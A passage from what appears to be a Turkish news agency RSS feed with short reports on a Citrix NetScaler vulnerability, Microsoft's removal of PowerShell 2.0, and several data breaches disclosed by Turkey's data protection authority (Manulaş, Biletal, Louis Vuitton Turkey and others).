<p data-start="1541" data-end="1979"><strong data-start="1541" data-end="1564">Olası giriş vektörü</strong><br data-start="1564" data-end="1567">Saldırı vektörü resmen açıklanmadı. Bununla birlikte siber güvenlik uzmanı Kevin Beaumont, yaklaşık bir ay önce Pennsylvania Başsavcılık ağı üzerinde internetten erişilen bazı Citrix NetScaler cihazlarının kritik CVE-2025-5777 (Citrix Bleed 2) açığına karşı savunmasız olduğunu tespit etmişti. Paylaşılan Shodan bulgularına göre iki cihazdan biri 29 Temmuz’dan, diğeri 7 Ağustos’tan bu yana çevrimdışı durumda.</p>
<p data-start="1981" data-end="2415"><strong data-start="1981" data-end="2008">Genişleyen risk tablosu</strong><br data-start="2008" data-end="2011">Shadowserver Foundation, pazartesi günü 3.300’ün üzerinde NetScaler cihazının hâlâ CVE-2025-5777’ye karşı savunmasız olduğunu rapor etti. Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), en az Mayıs başından beri bu açığın sıfır gün olarak kritik kuruluşlara karşı kullanıldığını bildirdi. Hollanda Savcılık Kurumu (Openbaar Ministerie) 18 Temmuz’da e-posta sunucularını etkileyen bir ihlali açıklamıştı.</p>
<p data-start="2417" data-end="2767"><strong data-start="2417" data-end="2452">Resmî uyarılar ve yükümlülükler</strong><br data-start="2452" data-end="2455">CISA, söz konusu Citrix açığını “Bilinen İstismar Edilen Zafiyetler” kataloğuna ekleyerek federal kurumlara acil yama yükümlülüğü getirdi. Kurumlar için öneriler; hızla yamalama, etkilenen cihazların internetten erişimini sınırlama ve olağandışı kimlik doğrulama aktivitelerine karşı izleme olarak sıralanıyor.</p>
<p data-start="2769" data-end="3019"><strong data-start="2769" data-end="2781"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft, PowerShell 2.0’ı Windows 11 ve Windows Server’dan kalıcı olarak kaldırıyor</title>
<link>https://www.ajansexpres.com.tr/microsoft-powershell-20i-windows-11-ve-windows-serverdan-kalici-olarak-kaldiriyor</link>
<guid>https://www.ajansexpres.com.tr/microsoft-powershell-20i-windows-11-ve-windows-serverdan-kalici-olarak-kaldiriyor</guid>
<description><![CDATA[ Windows 7 ile tanıtılan ve 14 yıldır kullanılan PowerShell 2.0, Ağustos 2025’ten itibaren Windows 11 sürüm 24H2’den, Eylül 2025’te ise Windows Server 2025’ten tamamen kaldırılacak. Microsoft, güvenlik ve sistem sadeleştirmesi için aldığı bu kararın eski yazılımlara bağımlı kullanıcıları etkileyeceğini belirtti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd4fe500b.webp" length="26198" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:43 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>PowerShell 2.0 ne zaman kaldırılacak, hangi kullanıcılar doğrudan etkilenecek, eski betikler hangi sürüme yönlendirilecek, Microsoft hangi güncelleme ve geçiş adımlarını öneriyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="454" data-end="457">Microsoft, sekiz yıl önce kullanım dışı ilan ettiği PowerShell 2.0’ı Windows işletim sistemlerinden tamamen kaldırma sürecini başlattı. Şirketin duyurusuna göre kaldırma işlemi Windows 11 için Ağustos 2025’te, Windows Server için ise Eylül 2025’te başlayacak.</p>
<p></p>
<p data-start="720" data-end="982">PowerShell 2.0, 2009’da Windows 7 ile birlikte tanıtılmış ve uzun süre sistem yönetiminde yaygın olarak kullanılmıştı. Ancak güvenlik zafiyetleri, modern özelliklerin eksikliği ve bakım yükü nedeniyle yıllardır sadece “isteğe bağlı özellik” olarak tutuluyordu.</p>
<p data-start="984" data-end="1292"><strong data-start="984" data-end="1010">Etkilenen Kullanıcılar</strong><br data-start="1010" data-end="1013">Microsoft, modern sürümler olan PowerShell 5.1 ve PowerShell 7’nin desteğinin devam ettiğini, dolayısıyla çoğu kullanıcı için bir sorun yaşanmayacağını açıkladı. Ancak PowerShell 2.0’a bağımlı eski uygulamalar ve betikler kullanan müşterilerin doğrudan etkileneceği bildirildi.</p>
<p data-start="1294" data-end="1522">Şirket, eski Microsoft ürünleri (Exchange, SharePoint, SQL Server gibi) ve bazı üçüncü taraf yazılımların hâlâ PowerShell 2.0’a ihtiyaç duyabileceğini, bu nedenle kullanıcıların sistemlerini uyarlamaları gerektiğini vurguladı.</p>
<p data-start="1524" data-end="1825"><strong data-start="1524" data-end="1557">Geriye Dönük Uyum ve Öneriler</strong><br data-start="1557" data-end="1560">PowerShell 2.0 çalıştırmaya çalışan betikler varsayılan olarak PowerShell 5.1’e yönlendirilecek. Çoğu komut ve modül geriye dönük uyumlulukla çalışsa da Microsoft, kullanıcıların eski betiklerini güncellemeleri ve PowerShell 7’ye geçiş yapmalarını tavsiye ediyor.</p>
<p data-start="1827" data-end="2106">Microsoft’un açıklamasında, “Desteklenen ve güncel PowerShell sürümlerini kullanarak betiklerinizin daha güvenli çalışmasını sağlayabilirsiniz. PowerShell 2.0’a bağımlı yazılım ve betiklerinizi güncellemeniz veya geçici çözümlerle uyarlamanız gerekmektedir” ifadeleri yer aldı.</p>
<p data-start="2108" data-end="2305"><strong data-start="2108" data-end="2120"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Manulaş’a fidye yazılımı saldırısı: 1,2 milyon kayıtta kişisel veri riski açıklandı</title>
<link>https://www.ajansexpres.com.tr/manulasa-fidye-yazilimi-saldirisi-12-milyon-kayitta-kisisel-veri-riski-aciklandi</link>
<guid>https://www.ajansexpres.com.tr/manulasa-fidye-yazilimi-saldirisi-12-milyon-kayitta-kisisel-veri-riski-aciklandi</guid>
<description><![CDATA[ Manisa’da toplu ulaşım hizmeti veren Manulaş’ın sistemlerine 25 Mayıs 2025’te fidye yazılımı saldırısı düzenlendi. 1 milyon 268 bin 222 kaydın etkilendiği olayda ad, T.C. kimlik numarası, iletişim ve sağlık bilgileri risk altına girdi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd4bb5d79.webp" length="40012" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:39 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Manulaş veri ihlalinde hangi kişisel bilgiler risk altında, saldırıdan kaç kişi etkilendi, veriler dışarıya sızdırıldı mı, vatandaşlar bilgi almak için nereye başvurabilir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="456" data-end="770"><strong data-start="456" data-end="491">Saldırı 25 Mayıs’ta gerçekleşti</strong><br data-start="491" data-end="494">Manulaş Manisa Ulaşım Hizmetleri Makina Sanayi ve Ticaret A.Ş., kişisel verileri etkileyen siber saldırıya ilişkin Kişisel Verileri Koruma Kurumu’na (KVKK) bildirimde bulundu. Açıklamaya göre fidye yazılımı saldırısı 25 Mayıs 2025’te meydana geldi ve aynı gün tespit edildi.</p>
<p data-start="772" data-end="1014"><strong data-start="772" data-end="813">1,2 milyon kayıtta risk tespit edildi</strong><br data-start="813" data-end="816">Şirket tarafından yapılan bildirimde, 1 milyon 268 bin 222 kayıt üzerinde ihlal gerçekleştiği, sistemde çok sayıda mükerrer veri bulunduğu için gerçek kişi sayısının daha az olabileceği aktarıldı.</p>
<p data-start="1016" data-end="1363"><strong data-start="1016" data-end="1052">Kapsamlı veri grupları etkilendi</strong><br data-start="1052" data-end="1055">Saldırıdan etkilenen kişisel veriler arasında ad, soyad, T.C. kimlik numarası, doğum tarihi, cinsiyet, telefon numarası, e-posta adresi, açık adres, meslek bilgisi, plaka numarası, fotoğraf ve sağlık bilgileri (engellilik durumu ve oranı) yer aldı. Etkilenen grupların aboneler ve üyeler olduğu bildirildi.</p>
<p data-start="1365" data-end="1597"><strong data-start="1365" data-end="1390">İnceleme devam ediyor</strong><br data-start="1390" data-end="1393">Verilerin dışarıya aktarılıp aktarılmadığı henüz tespit edilemezken, Kişisel Verileri Koruma Kurulu’nun 3 Haziran 2025 tarihli ve 2025/999 sayılı kararıyla ihlalin kamuoyuna duyurulması kararlaştırıldı.</p>
<p data-start="1599" data-end="1849"><strong data-start="1599" data-end="1634">Vatandaşların başvuru kanalları</strong><br data-start="1634" data-end="1637">İhlalden etkilenen kişiler, Manulaş’ın web sitesi (<a data-start="1688" data-end="1738" rel="noopener" target="_new" class="" href=" 0 236 232 19 00 numaralı telefon hattı veya <a data-start="1785" data-end="1804" class="cursor-pointer" rel="noopener">info@manulas.com.tr</a> e-posta adresi üzerinden bilgi alabilecek.</p>
<p data-start="1851" data-end="2041"><strong data-start="1851" data-end="1863"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Biletal veri ihlali: 7 bin 800 müşterinin bilgileri yasadışı platformlarda satışa çıkarıldı</title>
<link>https://www.ajansexpres.com.tr/biletal-veri-ihlali-7-bin-800-musterinin-bilgileri-yasadisi-platformlarda-satisa-cikarildi</link>
<guid>https://www.ajansexpres.com.tr/biletal-veri-ihlali-7-bin-800-musterinin-bilgileri-yasadisi-platformlarda-satisa-cikarildi</guid>
<description><![CDATA[ Bilet satış platformu Biletal’a ait müşteri verilerinin siber saldırganlar tarafından yasa dışı internet ortamında satışa sunulduğu belirlendi. 11 Ağustos 2025’te tespit edilen olayda yaklaşık 7 bin 800 kişinin kimlik, iletişim ve müşteri işlem verilerinin etkilendiği açıklandı. KVKK, ihlalin kamuoyuyla paylaşılmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd476e4a3.webp" length="42262" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:35 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Biletal veri ihlalinde kaç müşteri etkilendi, hangi kişisel veriler satışa çıkarıldı, ihlal ne zaman tespit edildi, KVKK hangi kararı aldı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="484" data-end="709"><strong data-start="484" data-end="527">Yasadışı platformlarda satışa çıkarıldı</strong><br data-start="527" data-end="530">Biletal İç ve Dış Ticaret A.Ş., siber saldırı sonucu kişisel verilerin yasa dışı internet platformlarında satışa çıkarıldığını Kişisel Verileri Koruma Kurumu’na (KVKK) bildirdi.</p>
<p data-start="711" data-end="943"><strong data-start="711" data-end="748">İhlal 11 Ağustos’ta tespit edildi</strong><br data-start="748" data-end="751">Açıklamaya göre, Bilgi Teknolojileri ve İletişim Kurumu’ndan (BTK) gelen yazının ardından şirket bilişim ekiplerinin yaptığı inceleme sonucunda ihlal 11 Ağustos 2025 tarihinde tespit edildi.</p>
<p data-start="945" data-end="1214"><strong data-start="945" data-end="976">7 bin 800 müşteri etkilendi</strong><br data-start="976" data-end="979">Veri ihlalinden yaklaşık 7 bin 800 kişinin etkilendiği belirtilirken, ihlale konu olan kişisel veriler arasında kimlik, iletişim ve müşteri işlem bilgileri bulunduğu ifade edildi. Etkilenen grubun sadece müşteriler olduğu bildirildi.</p>
<p data-start="1216" data-end="1437"><strong data-start="1216" data-end="1252">KVKK’dan kamuoyuna duyuru kararı</strong><br data-start="1252" data-end="1255">Kişisel Verileri Koruma Kurulu, 14 Ağustos 2025 tarihli ve 2025/1481 sayılı kararıyla ihlalin Kurum internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin inceleme sürüyor.</p>
<p data-start="1439" data-end="1596"><strong data-start="1439" data-end="1451"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yatırım Finansman’a fidye yazılımı saldırısı: Etkilenen kişi sayısı ve veri grupları araştırılıyor</title>
<link>https://www.ajansexpres.com.tr/yatirim-finansmana-fidye-yazilimi-saldirisi-etkilenen-kisi-sayisi-ve-veri-gruplari-arastiriliyor</link>
<guid>https://www.ajansexpres.com.tr/yatirim-finansmana-fidye-yazilimi-saldirisi-etkilenen-kisi-sayisi-ve-veri-gruplari-arastiriliyor</guid>
<description><![CDATA[ 20 Temmuz 2025’te Yatırım Finansman Menkul Değerler A.Ş. sunucu ve bilgisayarlarına uluslararası bir grup tarafından fidye yazılımı saldırısı düzenlendi. Kişisel verilerin hangi gruplara ait olduğu ve etkilenen kişi sayısı henüz tespit edilemedi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd435ebab.webp" length="36392" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:31 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Yatırım Finansman’a yönelik fidye yazılımı saldırısı ne zaman gerçekleşti, saldırıyı kimler düzenledi, kaç kişinin kişisel verisi etkilenmiş olabilir, vatandaşlar bilgi almak için hangi kanalları kullanabilir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="482" data-end="705"><strong data-start="482" data-end="516">Saldırı aynı gün tespit edildi</strong><br data-start="516" data-end="519">Yatırım Finansman Menkul Değerler A.Ş., 20 Temmuz 2025’te yaşanan fidye yazılımı saldırısını Kişisel Verileri Koruma Kurumu’na bildirdi. Açıklamaya göre saldırı aynı gün tespit edildi.</p>
<p data-start="707" data-end="894"><strong data-start="707" data-end="752">Uluslararası bir saldırı grubu hedef aldı</strong><br data-start="752" data-end="755">Şirketin bildiriminde, sunucular ve istemci bilgisayarların uluslararası ve uzman bir saldırı grubu tarafından hedef alındığı belirtildi.</p>
<p data-start="896" data-end="1126"><strong data-start="896" data-end="945">Kişisel veriler üzerindeki etki araştırılıyor</strong><br data-start="945" data-end="948">Saldırının ardından etkilenen kişi sayısı, ilgili kişi grupları ve kişisel veri kategorilerinin henüz belirlenemediği ifade edildi. Teknik incelemelerin devam ettiği aktarıldı.</p>
<p data-start="1128" data-end="1332"><strong data-start="1128" data-end="1166">Vatandaşlar için başvuru kanalları</strong><br data-start="1166" data-end="1169">Şirket, saldırıyla ilgili bilgi almak isteyen kişilerin tüm şubelerden ve 0 850 723 59 59 numaralı Yatırımcı Destek Hattı üzerinden destek alabileceğini duyurdu.</p>
<p data-start="1334" data-end="1513"><strong data-start="1334" data-end="1360">KVKK’dan duyuru kararı</strong><br data-start="1360" data-end="1363">Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1359 sayılı kararıyla ihlalin Kurumun internet sitesinde ilan edilmesine karar verdi.</p>
<p data-start="1515" data-end="1742"><strong data-start="1515" data-end="1527"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Bold LLC veri ihlali: 3 bini aşkın kullanıcının özgeçmiş bilgileri yetkisiz erişime açıldı</title>
<link>https://www.ajansexpres.com.tr/bold-llc-veri-ihlali-3-bini-askin-kullanicinin-oezgecmis-bilgileri-yetkisiz-erisime-acildi</link>
<guid>https://www.ajansexpres.com.tr/bold-llc-veri-ihlali-3-bini-askin-kullanicinin-oezgecmis-bilgileri-yetkisiz-erisime-acildi</guid>
<description><![CDATA[ Porto Riko merkezli çevrimiçi iş arama platformu Bold LLC’de, kullanıcıların özgeçmişlerini düzenlerken kullanılan ön izleme özelliğinde güvenlik açığı tespit edildi. 12 Temmuz 2025’te fark edilen olayda, 3168 kullanıcının anonimleştirilmiş özgeçmiş verilerine yetkisiz erişim sağlandığı belirlendi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd3f1d164.webp" length="48032" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:26 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Bold LLC veri ihlalinde hangi kişisel veriler açığa çıktı, güvenlik açığı ne zaman fark edildi, kaç kullanıcı etkilendi, yetkisiz erişim kaç kez gerçekleşti</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="527" data-end="877"><strong data-start="527" data-end="571">Güvenlik açığı 2023’ten bu yana mevcuttu</strong><br data-start="571" data-end="574">Bold LLC tarafından yapılan açıklamaya göre, kullanıcıların özgeçmişlerini düzenlerken gerçek zamanlı ön izleme imkânı sunan yeni bir özelliğin yetkisiz erişime açık olduğu 12 Temmuz 2025’te tespit edildi. İncelemeler, söz konusu açığın ilk olarak 10 Mart 2023 tarihinde ortaya çıktığını ortaya koydu.</p>
<p data-start="879" data-end="1147"><strong data-start="879" data-end="918">Bir kez yetkisiz erişim gerçekleşti</strong><br data-start="918" data-end="921">Şirketin bildiriminde, sunucu ortamının daha hızlı performans için anonimleştirilmiş verileri önbelleğe almak üzere erişilebilir hale getirildiği, bu durum nedeniyle yalnızca bir kez yetkisiz erişimin yaşandığı ifade edildi.</p>
<p data-start="1149" data-end="1573"><strong data-start="1149" data-end="1198">Anonimleştirilmiş özgeçmiş verileri etkilendi</strong><br data-start="1198" data-end="1201">İhlalden etkilenen veriler arasında isim, iletişim bilgileri ve özgeçmiş içerikleri yer aldı. Verilerin kapsamı kullanıcı tercihine bağlı olarak değişiklik gösterirken, bazı özgeçmişlerde sadece ad ve soyad bilgileri bulunduğu, bazılarında ise eğitim, istihdam geçmişi, iletişim bilgileri, fotoğraflar ve gönüllü olarak paylaşılan diğer bilgilerin yer aldığı bildirildi.</p>
<p data-start="1575" data-end="1759"><strong data-start="1575" data-end="1611">3 bini aşkın kullanıcı etkilendi</strong><br data-start="1611" data-end="1614">Bold LLC, ihlalden etkilenen ilgili kişi gruplarının kullanıcılar ve aboneler olduğunu, toplam 3168 kişinin verilerinin etkilendiğini açıkladı.</p>
<p data-start="1761" data-end="1992"><strong data-start="1761" data-end="1788">KVKK duyuru kararı aldı</strong><br data-start="1788" data-end="1791">Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1356 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. İncelemelerin sürdüğü aktarıldı.</p>
<p data-start="1994" data-end="2169"><strong data-start="1994" data-end="2006"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>BeiGene veri ihlali: Klinik çalışmalara ait dosyalar internete sızdı, Türkiye’den 467 kişi etkilendi</title>
<link>https://www.ajansexpres.com.tr/beigene-veri-ihlali-klinik-calismalara-ait-dosyalar-internete-sizdi-turkiyeden-467-kisi-etkilendi</link>
<guid>https://www.ajansexpres.com.tr/beigene-veri-ihlali-klinik-calismalara-ait-dosyalar-internete-sizdi-turkiyeden-467-kisi-etkilendi</guid>
<description><![CDATA[ 16 Haziran 2025’te BeiGene, Ltd. bünyesinde sınırlı sayıda kurumsal dosyanın internet ortamına yüklendiği belirlendi. Klinik çalışmalarla ilgili belgelerin sızması sonucu Türkiye’den 17 çalışan ve 450 hastanın kimlik, iletişim ve sağlık bilgilerinin etkilendiği açıklandı. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd3a75b51.webp" length="32880" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:22 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>BeiGene veri ihlalinde hangi dosyalar sızdırıldı, olaydan kaç kişi etkilendi, hangi kişisel veriler risk altında, ihlal ne zaman tespit edildi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="510" data-end="744"><strong data-start="510" data-end="561">Dosyalar yasa dışı paylaşım sitelerine yüklendi</strong><br data-start="561" data-end="564">BeiGene, Ltd. tarafından yapılan bildirimde, 16 Haziran 2025 tarihinde sınırlı sayıda kurumsal dosyanın pastebin.com ve swisstransfer.com platformlarına yüklendiği tespit edildi.</p>
<p data-start="746" data-end="925"><strong data-start="746" data-end="791">Klinik çalışmalara ait veriler sızdırıldı</strong><br data-start="791" data-end="794">Sızdırılan belgelerin, şirketin yürüttüğü klinik çalışmaların planlanması ve takibi için kullanılan verileri içerdiği belirtildi.</p>
<p data-start="927" data-end="1153"><strong data-start="927" data-end="949">467 kişi etkilendi</strong><br data-start="949" data-end="952">Veri ihlalinden Türkiye’de 17 çalışan ve 450 hasta olmak üzere toplam 467 kişinin etkilendiği bildirildi. Etkilenen kişisel veri kategorilerinin kimlik, iletişim ve sağlık bilgileri olduğu aktarıldı.</p>
<p data-start="1155" data-end="1413"><strong data-start="1155" data-end="1193">KVKK kamuoyuna duyurma kararı aldı</strong><br data-start="1193" data-end="1196">Kişisel Verileri Koruma Kurulu, 24 Haziran 2025 tarihli ve 2025/1130 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Olayla ilgili incelemelerin sürdüğü belirtildi.</p>
<p data-start="1415" data-end="1576"><strong data-start="1415" data-end="1427"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Louis Vuitton Türkiye’de veri ihlali: 142 bin müşterinin kimlik ve iletişim bilgileri sızdırıldı</title>
<link>https://www.ajansexpres.com.tr/louis-vuitton-turkiyede-veri-ihlali-142-bin-musterinin-kimlik-ve-iletisim-bilgileri-sizdirildi</link>
<guid>https://www.ajansexpres.com.tr/louis-vuitton-turkiyede-veri-ihlali-142-bin-musterinin-kimlik-ve-iletisim-bilgileri-sizdirildi</guid>
<description><![CDATA[ 7 Haziran 2025’te başlayan ve 2 Temmuz’da tespit edilen veri ihlalinde Louis Vuitton’un müşteri veritabanına yetkisiz erişim sağlandığı açıklandı. Türkiye’de 142 bin 995 kişinin kimlik ve iletişim bilgilerinin etkilendiği bildirildi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd3620020.webp" length="46750" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:18 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Louis Vuitton veri ihlali nasıl gerçekleşti, olaydan kaç kişi etkilendi, hangi kişisel veriler sızdırıldı, ihlal ne zaman tespit edildi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="467" data-end="818"><strong data-start="467" data-end="521">Yetkisiz erişim üçüncü taraf üzerinden gerçekleşti</strong><br data-start="521" data-end="524">Louis Vuitton Çantacılık Ticaret A.Ş., müşterilere ait veritabanına yönelik yetkisiz erişim hakkında Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, ihlal üçüncü taraf bir hizmet sağlayıcının yöneticisi tarafından kullanılan servis hesabının ele geçirilmesiyle başladı.</p>
<p data-start="820" data-end="1022"><strong data-start="820" data-end="842">İhlal bir ay sürdü</strong><br data-start="842" data-end="845">7 Haziran 2025’te başlayan saldırı, 2 Temmuz 2025’te tespit edildi. Yetkisiz erişim süresince müşterilere ait kimlik ve iletişim bilgilerinin risk altına girdiği ifade edildi.</p>
<p data-start="1024" data-end="1246"><strong data-start="1024" data-end="1050">142 bin kişi etkilendi</strong><br data-start="1050" data-end="1053">Türkiye’de 142 bin 995 müşteri ve potansiyel müşterinin verilerinin etkilendiği bildirildi. İncelemeler sürerken, etkilenen veri kategorilerinin kimlik ve iletişim bilgileri olduğu aktarıldı.</p>
<p data-start="1248" data-end="1443"><strong data-start="1248" data-end="1284">KVKK’dan kamuoyuna duyuru kararı</strong><br data-start="1284" data-end="1287">Kişisel Verileri Koruma Kurulu, 10 Temmuz 2025 tarihli ve 2025/1246 sayılı kararıyla veri ihlalinin kurumun internet sitesinde yayımlanmasına karar verdi.</p>
<p data-start="1445" data-end="1599"><strong data-start="1445" data-end="1457"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>İstanbul Gedik Üniversitesi’nde veri ihlali: 23 bin kişi etkilendi, 209 bin kayıtta kişisel bilgiler sızdı</title>
<link>https://www.ajansexpres.com.tr/istanbul-gedik-universitesinde-veri-ihlali-23-bin-kisi-etkilendi-209-bin-kayitta-kisisel-bilgiler-sizdi</link>
<guid>https://www.ajansexpres.com.tr/istanbul-gedik-universitesinde-veri-ihlali-23-bin-kisi-etkilendi-209-bin-kayitta-kisisel-bilgiler-sizdi</guid>
<description><![CDATA[ 13-14 Mayıs 2025 tarihlerinde İstanbul Gedik Üniversitesi adına veri işleyen şirketin sistemlerine yetkisiz erişim sağlandı. 23 bin 269 kişinin etkilendiği olayda ad, soyad, e-posta, kurum bilgileri ve trafik verileri gibi bilgilerin bulunduğu 209 bin 421 kayıt risk altına girdi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd3184dad.webp" length="32768" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:13 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>İstanbul Gedik Üniversitesi veri ihlali ne zaman gerçekleşti, olaydan kaç kişi etkilendi, hangi kişisel veriler sızdırıldı, KVKK hangi kararı aldı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="524" data-end="840"><strong data-start="524" data-end="557">Yetkisiz erişim iki gün sürdü</strong><br data-start="557" data-end="560">İstanbul Gedik Üniversitesi, yaşanan veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, 13-14 Mayıs 2025 tarihleri arasında üniversite adına veri işleyen şirketin sistemlerine yetkisiz erişim sağlandı ve durum 14 Mayıs’ta tespit edildi.</p>
<p data-start="842" data-end="1065"><strong data-start="842" data-end="882">23 bin kişi, 209 bin kayıt etkilendi</strong><br data-start="882" data-end="885">Veri ihlalinden çalışanlar, kullanıcılar ve öğrencilerin yer aldığı 23 bin 269 kişinin etkilendiği, toplamda 209 bin 421 kayıtta kişisel verilerin risk altında olduğu belirtildi.</p>
<p data-start="1067" data-end="1330"><strong data-start="1067" data-end="1095">Hangi veriler sızdırıldı</strong><br data-start="1095" data-end="1098">İhlalden etkilenen veriler arasında ad, soyad, kullanıcı adı, maskelenmiş T.C. kimlik numarası (yalnızca son dört hanesi görünür şekilde), e-posta adresi, kurum-departman bilgileri ve kullanıcı trafik verileri bulunduğu aktarıldı.</p>
<p data-start="1332" data-end="1551"><strong data-start="1332" data-end="1370">KVKK kararıyla kamuoyuna duyuruldu</strong><br data-start="1370" data-end="1373">Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/997 sayılı kararıyla veri ihlalinin kamuoyuna duyurulmasına karar verdi. Konuyla ilgili incelemeler devam ediyor.</p>
<p data-start="1553" data-end="1718"><strong data-start="1553" data-end="1565"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Richemont İstanbul’da veri ihlali: 25 bin müşterinin kimlik ve iletişim bilgileri ele geçirildi</title>
<link>https://www.ajansexpres.com.tr/richemont-istanbulda-veri-ihlali-25-bin-musterinin-kimlik-ve-iletisim-bilgileri-ele-gecirildi</link>
<guid>https://www.ajansexpres.com.tr/richemont-istanbulda-veri-ihlali-25-bin-musterinin-kimlik-ve-iletisim-bilgileri-ele-gecirildi</guid>
<description><![CDATA[ Lüks eşya dağıtım şirketi Richemont İstanbul’da 17-18 Ocak 2025 tarihlerinde yaşanan siber saldırıda, bir çalışanın hesabı ele geçirilerek müşteri verilerine erişim sağlandı. 25 bin 737 kişinin isim, e-posta, ülke bilgisi, müşteri kimliği ve doğum tarihi gibi kişisel verilerinin etkilendiği açıklandı. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd2d7289c.webp" length="32350" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:09 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Richemont İstanbul veri ihlali nasıl gerçekleşti, olaydan kaç müşteri etkilendi, hangi kişisel veriler sızdırıldı, ihlal ne zaman tespit edildi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="535" data-end="848"><strong data-start="535" data-end="588">Hesap ele geçirilerek müşteri verilerine ulaşıldı</strong><br data-start="588" data-end="591">Richemont İstanbul Lüks Eşya Dağıtım A.Ş., veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre ihlal, Richemont Group bünyesinde görev yapan bir çalışanın hesabının yetkisiz kişilerce ele geçirilmesiyle gerçekleşti.</p>
<p data-start="850" data-end="1005"><strong data-start="850" data-end="885">İhlal dört ay sonra fark edildi</strong><br data-start="885" data-end="888">Saldırının 17-18 Ocak 2025 tarihlerinde gerçekleştiği, ancak 30 Mayıs 2025 tarihinde tespit edilebildiği aktarıldı.</p>
